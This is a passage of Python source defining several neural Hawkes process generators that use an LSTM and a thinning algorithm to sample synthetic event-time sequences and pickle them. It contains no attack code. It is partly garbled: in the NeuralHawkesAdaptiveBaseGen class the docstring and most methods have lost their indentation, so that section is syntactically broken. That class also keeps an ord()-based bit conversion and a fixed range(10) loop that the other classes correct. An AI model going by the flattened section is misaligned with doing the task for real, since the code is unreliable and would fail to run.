        self.hidden_t = numpy.copy(hidden_t_new)
        self.cell_t = numpy.copy(cell_t_new)
    #
    def compute_intensity_given_past(self, time_current):
        """Set ``self.intensity`` per type at ``time_current``: each
        hidden unit's contribution decays exponentially at its
        per-type rate since the most recent event."""
        time_recent = self.one_seq[-1]['time_since_start']
        hidden_with_time = numpy.exp(
            -self.delta * (
                time_current - time_recent
            )
        ) * self.hidden_t[:, None]
        # (dim_model, dim_process); W_alpha has the same shape
        self.intensity_tilde = numpy.sum(
            self.W_alpha * hidden_with_time,
            axis = 0
        ) + self.mu
        self.intensity = self.soft_relu(
            self.intensity_tilde
        )
    #
    def compute_intensity_upper_bound(self, time_current):
        """Set ``self.intensity_ub``: keep only the non-negative
        (hence decreasing-in-t) contributions, giving a valid upper
        bound for the thinning sampler."""
        time_recent = self.one_seq[-1]['time_since_start']
        hidden_with_time = numpy.exp(
            -self.delta * (
                time_current - time_recent
            )
        ) * self.hidden_t[:, None]
        # (dim_model, dim_process); W_alpha has the same shape
        self.intensity_tilde_ub = numpy.sum(
            self.hard_relu(
                self.W_alpha * hidden_with_time
            ),
            axis = 0
        ) + self.hard_relu(self.mu)
        self.intensity_ub = self.soft_relu(
            self.intensity_tilde_ub
        )
    #
    def sample_time_given_type(self, type_event):
        """Sample the next occurrence time of ``type_event`` (the
        little k in the paper) via the thinning algorithm."""
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        self.compute_intensity_upper_bound(time_current)
        intensity_hazard = numpy.copy(
            self.intensity_ub[type_event]
        )
        u = 1.5
        while u >= 1.0:
            E = numpy.random.exponential(
                scale=1.0, size=None
            )
            U = numpy.random.uniform(
                low=0.0, high=1.0, size=None
            )
            time_current += E / intensity_hazard
            self.compute_intensity_given_past(time_current)
            # accept the proposed time when u < 1
            u = U * intensity_hazard / self.intensity[type_event]
        return time_current
    #
    def gen_one_seq(self, max_len):
        '''
        Generate one sequence of ``max_len`` events with the thinning
        algorithm of Liniger (2009), p. 28: sample one candidate time
        per event type, keep the minimum, discard the others.
        '''
        self.restart_sequence()
        time_since_start = numpy.float32(0.0)
        # per-type clock of each type's last occurrence
        time_since_start_each_event = numpy.zeros(
            (self.dim_process,), dtype=dtype
        )
        for idx_event in range(max_len):
            time_of_happen = numpy.zeros(
                (self.dim_process,), dtype=dtype
            )
            # refresh LSTM state for the most recent event
            self.compute_hidden_states()
            for type_event in range(self.dim_process):
                # sample one event using "thinning algorithm"
                time_of_happen[type_event] = numpy.copy(
                    self.sample_time_given_type(
                        type_event
                    )
                )
            time_since_start_new = numpy.min(time_of_happen)
            type_event_new = numpy.argmin(time_of_happen)
            self.cnt_total_event += 1
            # bookkeeping for the accepted event
            time_since_last_event = time_since_start_new - time_since_start
            time_since_start = time_since_start_new
            time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
            time_since_start_each_event[type_event_new] = time_since_start
            self.one_seq.append(
                {
                    'idx_event': self.cnt_total_event,
                    'type_event': type_event_new,
                    'time_since_start': time_since_start,
                    'time_since_last_event': time_since_last_event,
                    'time_since_last_same_event': time_since_last_same_event
                }
            )
        # throw away the BOS item at the head of the sequence
        self.one_seq.pop(0)
    #
    def gen_seqs(self, settings):
        """Generate ``settings['num_seqs']`` sequences, lengths drawn
        uniformly from [min_len, max_len]."""
        num_seqs = settings['num_seqs']
        self.list_seqs = []
        cnt_seqs = 0
        while cnt_seqs < num_seqs:
            max_len = numpy.int32(
                round(
                    numpy.random.uniform(
                        low=settings['min_len'],
                        high=settings['max_len']
                    )
                )
            )
            self.gen_one_seq(max_len)
            self.list_seqs.append(self.one_seq)
            cnt_seqs += 1
            if cnt_seqs % 10 == 9:
                print("idx seq of gen : ", (cnt_seqs, self.name))
                print("total number of seqs : ", num_seqs)
    #
    def print_some(self):
        """Print events and times for up to the first 10 sequences.

        min(...) guards against the IndexError the hard-coded
        range(10) raised when fewer than 10 seqs were generated.
        """
        print("printing some seqs ... ")
        for idx_seq in range(min(10, len(self.list_seqs))):
            print("the id of this seq is : ", idx_seq)
            seq = self.list_seqs[idx_seq]
            list_events, list_time = [], []
            for event_item in seq:
                list_events.append(event_item['type_event'])
                list_time.append(
                    round(event_item['time_since_start'], 4)
                )
            print(list_events)
            print(list_time)
    #
    def save_seqs(self, file_save):
        """Pickle the generated sequences to ``file_save``."""
        with open(file_save, 'wb') as f:
            pickle.dump(self.list_seqs, f)
class GeneralizedNeuralHawkesGen(object):
    '''
    Sequence generator using a generalized Neural Hawkes process:
    like NeuralHawkesGen, but the per-type decay rates are themselves
    a (softplus of a) function of the LSTM hidden state via W_delta.
    '''
    def __init__(self, settings):
        """Randomly initialize all parameters.

        settings keys used: dim_process, dim_LSTM, args, seed_random.
        """
        self.dim_process = settings['dim_process']
        self.dim_model = settings['dim_LSTM']
        # elapsed times enter the LSTM via a 32-bit float encoding
        self.dim_float = numpy.int32(32)
        self.dim_time = self.dim_float
        self.args = settings['args']
        numpy.random.seed(
            settings['seed_random']
        )
        # base intensity per event type
        self.mu = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (self.dim_process,)
            )
        )
        # maps hidden state to per-(hidden unit, type) decay rates
        self.W_delta = numpy.float32(
            numpy.random.uniform(
                low = -1.0, high= 1.0,
                size=(
                    self.dim_model, self.dim_model,
                    self.dim_process
                )
            )
        )
        # weights mapping hidden state to additive intensity terms
        self.W_alpha = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (self.dim_model, self.dim_process)
            )
        )
        # event-type embeddings; the extra row is the BOS pseudo-event
        self.Emb_event = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (
                    self.dim_process + numpy.int32(1),
                    self.dim_model
                )
            )
        )
        self.Emb_time = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (
                    self.dim_time, self.dim_model
                )
            )
        )
        # LSTM recurrence over [event emb; time emb; hidden] -> 4 gates
        self.W_recur = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (
                    3 * self.dim_model,
                    4 * self.dim_model
                )
            )
        )
        self.b_recur = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (4*self.dim_model, )
            )
        )
        self.name = 'GeneralizedNeuralHawkesGen'
        self.intensity_tilde = None
        self.intensity = None
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        # the sequence starts with a BOS pseudo-event at time 0
        self.one_seq = []
        self.one_seq.append(
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        )
        self.hidden_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cnt_total_event = numpy.int32(len(self.one_seq))
    #
    def soft_relu(self, x):
        """Softplus log(1 + exp(x)); logaddexp avoids overflow of the
        naive form for large positive x."""
        return numpy.logaddexp(numpy.float32(0.0), x)
    #
    def hard_relu(self, x):
        """ReLU: 0.5 * (x + |x|) == max(x, 0)."""
        return numpy.float32(0.5) * (x + numpy.abs(x) )
    #
    def save_model(self, file_save):
        """Pickle all parameters and meta info to ``file_save``."""
        print("saving model of generator ... ")
        model_dict = {
            'mu': numpy.copy(self.mu),
            'W_delta': numpy.copy(self.W_delta),
            'W_alpha': numpy.copy(self.W_alpha),
            'Emb_event': numpy.copy(self.Emb_event),
            'Emb_time': numpy.copy(self.Emb_time),
            'W_recur': numpy.copy(self.W_recur),
            'b_recur': numpy.copy(self.b_recur),
            'dim_process': self.dim_process,
            'dim_model': self.dim_model,
            'dim_time': self.dim_time,
            'dim_float': self.dim_float,
            'name': self.name,
            'args': self.args
        }
        with open(file_save, 'wb') as f:
            pickle.dump(model_dict, f)
    #
    def restart_sequence(self):
        """Clear the event memory, reset the clock to 0, re-seed the
        BOS pseudo-event and zero the LSTM state."""
        self.intensity_tilde = None
        self.intensity = None
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        self.one_seq = []
        self.one_seq.append(
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        )
        self.hidden_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cnt_total_event = numpy.int32(len(self.one_seq))
    #
    def float32_to_bit(self, float_input):
        '''
        Convert ``float_input`` to float32 and return its 32-bit
        IEEE-754 representation as a 0/1 vector of length dim_float.
        '''
        float32_input = numpy.float32(float_input)
        # bytearray yields ints on both Python 2 and 3; the previous
        # ``ord(c)`` loop raised TypeError on Python 3, where
        # iterating bytes already yields ints
        str_input = ''.join(
            format(byte_value, '08b')
            for byte_value in bytearray(struct.pack('!f', float32_input))
        )
        bit_input = numpy.zeros(
            (self.dim_float,), dtype=dtype
        )
        assert(self.dim_float == len(str_input))
        for idx, item_in_input in enumerate(str_input):
            bit_input[idx] = numpy.float32(item_in_input)
        return numpy.copy(bit_input)
    #
    def sigmoid(self, x):
        """Logistic function 1 / (1 + exp(-x))."""
        return 1 / (1+numpy.exp(-x))
    #
    def compute_hidden_states(self):
        """One LSTM step for the most recent event in ``one_seq``:
        embed (type, elapsed time), apply the recurrence, update
        ``hidden_t`` / ``cell_t``."""
        emb_event_t = self.Emb_event[
            self.one_seq[-1]['type_event'], :
        ]
        emb_time_t = numpy.dot(
            self.float32_to_bit(
                self.one_seq[-1]['time_since_last_event']
            ),
            self.Emb_time
        )
        # one affine transform produces all 4 gate pre-activations
        post_transform = numpy.dot(
            numpy.concatenate(
                (emb_event_t, emb_time_t, self.hidden_t),
                axis = 0
            ),
            self.W_recur
        ) + self.b_recur
        gate_input = self.sigmoid(
            post_transform[:self.dim_model]
        )
        gate_forget = self.sigmoid(
            post_transform[self.dim_model:2*self.dim_model]
        )
        gate_output = self.sigmoid(
            post_transform[2*self.dim_model:3*self.dim_model]
        )
        gate_pre_c = numpy.tanh(
            post_transform[3*self.dim_model:]
        )
        cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
        hidden_t_new = gate_output * numpy.tanh(cell_t_new)
        self.hidden_t = numpy.copy(hidden_t_new)
        self.cell_t = numpy.copy(cell_t_new)
    #
    def compute_intensity_given_past(self, time_current):
        """Set ``self.intensity`` per type at ``time_current``; the
        decay rates are computed from the current hidden state."""
        time_recent = self.one_seq[-1]['time_since_start']
        # hidden-state-dependent positive decay rates
        delta = self.soft_relu(
            numpy.tensordot(
                self.hidden_t, self.W_delta, (0, 0)
            )
        )
        hidden_with_time = numpy.exp(
            -delta * (
                time_current - time_recent
            )
        ) * self.hidden_t[:, None]
        # (dim_model, dim_process); W_alpha has the same shape
        self.intensity_tilde = numpy.sum(
            self.W_alpha * hidden_with_time,
            axis = 0
        ) + self.mu
        self.intensity = self.soft_relu(
            self.intensity_tilde
        )
    #
    def compute_intensity_upper_bound(self, time_current):
        """Set ``self.intensity_ub``: keep only the non-negative
        (hence decreasing-in-t) contributions, giving a valid upper
        bound for the thinning sampler."""
        time_recent = self.one_seq[-1]['time_since_start']
        # hidden-state-dependent positive decay rates
        delta = self.soft_relu(
            numpy.tensordot(
                self.hidden_t, self.W_delta, (0, 0)
            )
        )
        hidden_with_time = numpy.exp(
            -delta * (
                time_current - time_recent
            )
        ) * self.hidden_t[:, None]
        # (dim_model, dim_process); W_alpha has the same shape
        self.intensity_tilde_ub = numpy.sum(
            self.hard_relu(
                self.W_alpha * hidden_with_time
            ),
            axis = 0
        ) + self.hard_relu(self.mu)
        self.intensity_ub = self.soft_relu(
            self.intensity_tilde_ub
        )
    #
    def sample_time_given_type(self, type_event):
        """Sample the next occurrence time of ``type_event`` (the
        little k in the paper) via the thinning algorithm."""
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        self.compute_intensity_upper_bound(time_current)
        intensity_hazard = numpy.copy(
            self.intensity_ub[type_event]
        )
        u = 1.5
        while u >= 1.0:
            E = numpy.random.exponential(
                scale=1.0, size=None
            )
            U = numpy.random.uniform(
                low=0.0, high=1.0, size=None
            )
            time_current += E / intensity_hazard
            self.compute_intensity_given_past(time_current)
            # accept the proposed time when u < 1
            u = U * intensity_hazard / self.intensity[type_event]
        return time_current
    #
    def gen_one_seq(self, max_len):
        '''
        Generate one sequence of ``max_len`` events with the thinning
        algorithm of Liniger (2009), p. 28: sample one candidate time
        per event type, keep the minimum, discard the others.
        '''
        self.restart_sequence()
        time_since_start = numpy.float32(0.0)
        # per-type clock of each type's last occurrence
        time_since_start_each_event = numpy.zeros(
            (self.dim_process,), dtype=dtype
        )
        for idx_event in range(max_len):
            time_of_happen = numpy.zeros(
                (self.dim_process,), dtype=dtype
            )
            # refresh LSTM state for the most recent event
            self.compute_hidden_states()
            for type_event in range(self.dim_process):
                # sample one event using "thinning algorithm"
                time_of_happen[type_event] = numpy.copy(
                    self.sample_time_given_type(
                        type_event
                    )
                )
            time_since_start_new = numpy.min(time_of_happen)
            type_event_new = numpy.argmin(time_of_happen)
            self.cnt_total_event += 1
            # bookkeeping for the accepted event
            time_since_last_event = time_since_start_new - time_since_start
            time_since_start = time_since_start_new
            time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
            time_since_start_each_event[type_event_new] = time_since_start
            self.one_seq.append(
                {
                    'idx_event': self.cnt_total_event,
                    'type_event': type_event_new,
                    'time_since_start': time_since_start,
                    'time_since_last_event': time_since_last_event,
                    'time_since_last_same_event': time_since_last_same_event
                }
            )
        # throw away the BOS item at the head of the sequence
        self.one_seq.pop(0)
    #
    def gen_seqs(self, settings):
        """Generate ``settings['num_seqs']`` sequences, lengths drawn
        uniformly from [min_len, max_len]."""
        num_seqs = settings['num_seqs']
        self.list_seqs = []
        cnt_seqs = 0
        while cnt_seqs < num_seqs:
            max_len = numpy.int32(
                round(
                    numpy.random.uniform(
                        low=settings['min_len'],
                        high=settings['max_len']
                    )
                )
            )
            self.gen_one_seq(max_len)
            self.list_seqs.append(self.one_seq)
            cnt_seqs += 1
            if cnt_seqs % 10 == 9:
                print("idx seq of gen : ", (cnt_seqs, self.name))
                print("total number of seqs : ", num_seqs)
    #
    def print_some(self):
        """Print events and times for up to the first 10 sequences.

        min(...) guards against the IndexError the hard-coded
        range(10) raised when fewer than 10 seqs were generated.
        """
        print("printing some seqs ... ")
        for idx_seq in range(min(10, len(self.list_seqs))):
            print("the id of this seq is : ", idx_seq)
            seq = self.list_seqs[idx_seq]
            list_events, list_time = [], []
            for event_item in seq:
                list_events.append(event_item['type_event'])
                list_time.append(
                    round(event_item['time_since_start'], 4)
                )
            print(list_events)
            print(list_time)
    #
    def save_seqs(self, file_save):
        """Pickle the generated sequences to ``file_save``."""
        with open(file_save, 'wb') as f:
            pickle.dump(self.list_seqs, f)
class NeuralHawkesAdaptiveBaseGen(object):
'''
here is the sequence generator using Neural Hawkes process
'''
    def __init__(self, settings):
        """Randomly initialize the adaptive neural Hawkes generator.

        Here both the base rates (via W_mu) and the decay rates (via
        W_delta) are functions of the LSTM hidden state.
        settings keys used: dim_process, dim_LSTM, args, seed_random.
        """
        #
        self.dim_process = settings['dim_process']
        self.dim_model = settings['dim_LSTM']
        #
        # elapsed times enter the LSTM via a 32-bit float encoding
        self.dim_float = numpy.int32(32)
        self.dim_time = self.dim_float
        #
        self.args = settings['args']
        numpy.random.seed(
            settings['seed_random']
        )
        # hidden-state-dependent base-rate weights
        self.W_mu = numpy.float32(
            numpy.random.uniform(
                low = -1.0, high = 1.0,
                size = (
                    self.dim_model, self.dim_process
                )
            )
        )
        #
        # hidden-state-dependent decay-rate weights
        self.W_delta = numpy.float32(
            numpy.random.uniform(
                low = -1.0, high = 1.0,
                size=(
                    self.dim_model, self.dim_model,
                    self.dim_process
                )
            )
        )
        #
        self.W_alpha = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (self.dim_model, self.dim_process)
            )
        )
        # event-type embeddings; extra row is the BOS pseudo-event
        self.Emb_event = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (
                    self.dim_process + numpy.int32(1),
                    self.dim_model
                )
            )
        )
        self.Emb_time = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (
                    self.dim_time, self.dim_model
                )
            )
        )
        # LSTM recurrence over [event emb; time emb; hidden] -> 4 gates
        self.W_recur = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (
                    3 * self.dim_model,
                    4 * self.dim_model
                )
            )
        )
        self.b_recur = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (4*self.dim_model, )
            )
        )
        #
        #self.intensity = numpy.copy(self.mu)
        self.name = 'AdaptiveNeuralHawkesGen'
        #
        self.intensity_tilde = None
        self.intensity = None
        #
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        #
        self.one_seq = []
        # initialization for LSTM states: BOS pseudo-event at time 0
        self.one_seq.append(
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        )
        self.hidden_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        #self.flag_continue = True
        self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
def soft_relu(self, x):
return numpy.log(numpy.float32(1.0)+numpy.exp(x))
#
def hard_relu(self, x):
return numpy.float32(0.5) * (x + numpy.abs(x) )
#
#
    def save_model(self, file_save):
        """Pickle all generator parameters and meta info to ``file_save``.

        Arrays are copied so later in-place updates to the live model
        do not alias the saved snapshot.
        """
        print("saving model of generator ... ")
        model_dict = {
            'W_mu': numpy.copy(self.W_mu),
            'W_delta': numpy.copy(self.W_delta),
            'W_alpha': numpy.copy(self.W_alpha),
            'Emb_event': numpy.copy(self.Emb_event),
            'Emb_time': numpy.copy(self.Emb_time),
            'W_recur': numpy.copy(self.W_recur),
            'b_recur': numpy.copy(self.b_recur),
            'dim_process': self.dim_process,
            'dim_model': self.dim_model,
            'dim_time': self.dim_time,
            'dim_float': self.dim_float,
            'name': self.name,
            'args': self.args
        }
        with open(file_save, 'wb') as f:
            pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
#
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
#
#
def float32_to_bit(self, float_input):
'''
input a number in float, convert it to float32
get its 32-bit representations
'''
float32_input = numpy.float32(float_input)
str_input = ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', float32_input))
bit_input = numpy.zeros(
(self.dim_float,), dtype=dtype
)
assert(self.dim_float == len(str_input))
for idx, item_in_input in enumerate(str_input):
bit_input[idx] = numpy.float32(item_in_input)
return numpy.copy(bit_input)
#
#
def sigmoid(self, x):
return 1 / (1+numpy.exp(-x))
#
#
def compute_hidden_states(self):
# every time it is called,
# it computes the new hidden states of the LSTM
# it gets the last event in the sequence
# which is generated at t_(rec(t))
# and compute its hidden states
emb_event_t = self.Emb_event[
self.one_seq[-1]['type_event'], :
]
emb_time_t = numpy.dot(
self.float32_to_bit(
self.one_seq[-1]['time_since_last_event']
),
self.Emb_time
)
post_transform = numpy.dot(
numpy.concatenate(
(emb_event_t, emb_time_t, self.hidden_t),
axis = 0
),
self.W_recur
) + self.b_recur
#
gate_input = self.sigmoid(
post_transform[:self.dim_model]
)
gate_forget = self.sigmoid(
post_transform[self.dim_model:2*self.dim_model]
)
gate_output = self.sigmoid(
post_transform[2*self.dim_model:3*self.dim_model]
)
gate_pre_c = numpy.tanh(
post_transform[3*self.dim_model:]
)
#
cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
hidden_t_new = gate_output * numpy.tanh(cell_t_new)
self.hidden_t = numpy.copy(hidden_t_new)
self.cell_t = numpy.copy(cell_t_new)
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
#
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde = numpy.sum(
self.W_alpha * hidden_with_time,
axis = 0
) + numpy.dot(
self.hidden_t, self.W_mu
)
#
self.intensity = self.soft_relu(
self.intensity_tilde
)
# intensity computation is finished
#
def compute_intensity_upper_bound(self, time_current):
# compute the upper bound of intensity
# at the current time
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde_ub = numpy.sum(
self.hard_relu(
self.W_alpha * hidden_with_time
),
axis = 0
) + self.hard_relu(
numpy.dot(
self.hidden_t, self.W_mu
)
)
#
self.intensity_ub = self.soft_relu(
self.intensity_tilde_ub
)
# intensity computation is finished
#
#
def sample_time_given_type(self, type_event):
# type_event is the type of event for which we want to sample the time
# it is the little k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
#self.compute_intensity(time_current)
self.compute_intensity_upper_bound(time_current)
#
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
#
u = 1.5
while u >= 1.0:
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
time_current += E / intensity_hazard
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / self.intensity[type_event]
#
return time_current
#
#
#
def gen_one_seq(self, max_len):
self.restart_sequence()
'''
Liiniger (2009), p. 28, describes a "thinning algorithm":
generate one event of each type, take the minimum,
and discard the others.
Details found in my paper write-up
#
max_len is a pre-sampled value to set the length of seq
'''
# initialize the seq
time_since_start = numpy.float32(0.0)
time_since_start_each_event = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
for idx_event in range(max_len):
time_of_happen = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
# compute the hidden states
# of the most recent event in sequence
self.compute_hidden_states()
#
for type_event in range(self.dim_process):
# sample one event using "thinning algorithm"
time_of_happen[type_event] = numpy.copy(
self.sample_time_given_type(
type_event
)
)
#
time_since_start_new = numpy.min(time_of_happen)
type_event_new = numpy.argmin(time_of_happen)
self.cnt_total_event += 1
#
# update sequence
time_since_last_event = time_since_start_new - time_since_start
time_since_start = time_since_start_new
time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
time_since_start_each_event[type_event_new] = time_since_start
self.one_seq.append(
{
'idx_event': self.cnt_total_event,
'type_event': type_event_new,
'time_since_start': time_since_start,
'time_since_last_event': time_since_last_event,
'time_since_last_same_event': time_since_last_same_event
}
)
#
# throw away the BOS item
# at the head of the sequence
self.one_seq.pop(0)
#
#
#
def gen_seqs(self, settings):
#
#print(settings)
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events, list_time = [], []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
print(list_events)
print(list_time)
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
class NeuralHawkesAdaptiveBaseGen_time(object):
    '''
    Sequence generator for an adaptive neural Hawkes process.

    At every event the LSTM reads an embedding of the event type and an
    embedding of the elapsed time, where the time is represented by
    hard_relu(dt - Threshold_time) with the raw dt appended.  New events
    are sampled with an adaptive thinning algorithm.

    Bug fixed here: save_model previously omitted 'Threshold_time' even
    though the pretrained-model loader in __init__ requires it, so saved
    models could not be reloaded.
    '''
    def __init__(self, settings):
        # settings keys used: 'args', 'path_pre_train' and, when
        # initializing randomly, 'dim_process', 'dim_LSTM', 'seed_random'
        print("initializing generator ... ")
        self.args = settings['args']
        self.dim_float = numpy.int32(32)
        if settings['path_pre_train'] is None:
            print("random parameters ... ")
            self.dim_process = settings['dim_process']
            self.dim_model = settings['dim_LSTM']
            self.dim_time = self.dim_float
            numpy.random.seed(settings['seed_random'])

            def _rand(shape, low=-1.0, high=1.0):
                # shared uniform float32 initializer; the call order
                # below matters: it consumes the seeded RNG stream
                return numpy.float32(
                    numpy.random.uniform(low=low, high=high, size=shape)
                )
            self.W_mu = _rand((self.dim_model, self.dim_process))
            self.W_delta = _rand(
                (self.dim_model, self.dim_model, self.dim_process)
            )
            self.W_alpha = _rand((self.dim_model, self.dim_process))
            # one extra embedding row for the BOS event type
            self.Emb_event = _rand(
                (self.dim_process + numpy.int32(1), self.dim_model)
            )
            # one extra input row for the raw (un-thresholded) time
            self.Emb_time = _rand(
                (self.dim_time + numpy.int32(1), self.dim_model)
            )
            self.Threshold_time = _rand((self.dim_time, ), low=0.0)
            self.W_recur = _rand(
                (3 * self.dim_model, 4 * self.dim_model)
            )
            self.b_recur = _rand((4 * self.dim_model, ))
        else:
            print("read pretrained model ... ")
            path_pre_train = os.path.abspath(settings['path_pre_train'])
            with open(path_pre_train, 'rb') as f:
                model_pre_train = pickle.load(f)
            self.dim_process = model_pre_train['dim_process']
            self.dim_model = model_pre_train['dim_model']
            self.dim_time = model_pre_train['dim_time']
            self.W_mu = model_pre_train['W_mu']
            self.W_delta = model_pre_train['W_delta']
            self.W_alpha = model_pre_train['W_alpha']
            self.Emb_event = model_pre_train['Emb_event']
            self.Emb_time = model_pre_train['Emb_time']
            self.Threshold_time = model_pre_train['Threshold_time']
            self.W_recur = model_pre_train['W_recur']
            self.b_recur = model_pre_train['b_recur']
        #
        self.name = 'AdaptiveNeuralHawkesGen_time'
        # cached intensities, refreshed by the compute_* methods
        self.intensity_tilde = None
        self.intensity = None
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        # every sequence starts with a BOS marker of the special event
        # type self.dim_process at time zero
        self.one_seq = [
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        ]
        self.hidden_t = numpy.zeros((self.dim_model, ), dtype=dtype)
        self.cell_t = numpy.zeros((self.dim_model, ), dtype=dtype)
        self.cnt_total_event = numpy.int32(len(self.one_seq))
        print("initialization done ")
    #
    def soft_relu(self, x):
        '''Softplus log(1 + exp(x)); keeps intensities and decays positive.'''
        return numpy.log(numpy.float32(1.0) + numpy.exp(x))
    #
    def hard_relu(self, x):
        '''Rectifier max(x, 0), written branch-free.'''
        return numpy.float32(0.5) * (x + numpy.abs(x))
    #
    def save_model(self, file_save):
        '''
        Pickle all parameters and dimensions to file_save.

        Bug fix: 'Threshold_time' is now included; it was missing even
        though the pretrained-model loader in __init__ reads it.
        '''
        print("saving model of generator ... ")
        model_dict = {
            'W_mu': numpy.copy(self.W_mu),
            'W_delta': numpy.copy(self.W_delta),
            'W_alpha': numpy.copy(self.W_alpha),
            'Emb_event': numpy.copy(self.Emb_event),
            'Emb_time': numpy.copy(self.Emb_time),
            'Threshold_time': numpy.copy(self.Threshold_time),
            'W_recur': numpy.copy(self.W_recur),
            'b_recur': numpy.copy(self.b_recur),
            'dim_process': self.dim_process,
            'dim_model': self.dim_model,
            'dim_time': self.dim_time,
            'dim_float': self.dim_float,
            'name': self.name,
            'args': self.args
        }
        with open(file_save, 'wb') as f:
            pickle.dump(model_dict, f)
    #
    def restart_sequence(self):
        '''Reset cached intensities, the event list (fresh BOS) and LSTM state.'''
        self.intensity_tilde = None
        self.intensity = None
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        self.one_seq = [
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        ]
        self.hidden_t = numpy.zeros((self.dim_model, ), dtype=dtype)
        self.cell_t = numpy.zeros((self.dim_model, ), dtype=dtype)
        self.cnt_total_event = numpy.int32(len(self.one_seq))
    #
    def float32_to_bit(self, float_input):
        '''
